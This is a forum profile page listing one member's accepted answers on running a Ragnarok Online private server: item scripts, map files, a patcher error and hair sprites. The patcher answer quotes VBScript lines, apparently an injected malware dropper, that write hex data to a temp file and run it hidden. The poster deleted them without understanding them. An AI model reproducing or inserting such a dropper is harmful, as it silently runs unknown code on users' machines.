Jump to content

Erio-chan

Members
  • Posts

    97
  • Joined

  • Last visited

Community Answers

  1. Erio-chan's post in Rental key when expired auto kick out on map was marked as the answer   
    [SOLVED]
    7493,Bloody_Temple_key,Bloody Temple key,3,0,,0,,,,,,,,,,,,,{},{},{if( strcharinfo(3) == "2@mir" && !( countitem(7493) -1 ) ) warp "prontera",157,177;}  
  2. Erio-chan's post in Old prt_fild08 bridge was marked as the answer   
    all old map are still inside the latest .grf file they just renamed them.
    ex. old prontera : prontera they renamed it to pprontera
    just find it inside your grf using grf editor. rename it back to its real name delete the new map or rename so it can't be read by client
    and make sure to mapcache to avoid error

    see pic attach


  3. Erio-chan's post in Thor patcher error was marked as the answer   
    I have just figure out it my self
    I open the file ( in my case its index.html) that causing the error in c++ note
    I deleted 1 by 1 all script line that constantly appearing in the popup error
    these are the lines that I have deleted
    Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 I dunno what is that and what is the function of that script
    but I tested my Patcher and it works perfectly with no error
    I hope someone here would explain us what is that script
  4. Erio-chan's post in Help character head turn all black was marked as the answer   
    Thanks for your reply @munding12 
    I tried to use hair sprite and hair palettes from the private server that I'm playing to be sure that they are compatible. I deleted all of my palettes and hair style to have no conflict but still not working.
     
    in addition to this because the number of hairstyle on that private server is 60 so I set my
    client.conf to:
     
    // Valid range of dyes and styles on the client. min_hair_style: 0 max_hair_style: 60 min_hair_color: 0 max_hair_color: 500 min_cloth_color: 0 max_cloth_color: 553 min_body_style: 0 max_body_style: 1  and diff my exe to use 64k hair style
     
    problems are:
     
    only 1-30 hair style are available in game, changing style 31-60 is still the hair style #30
    only default color or any hair style are work, changing it makes head turn black
     
    pls. help    

    I know now the cause of my problem, it is my exe 
     
×
×
  • Create New...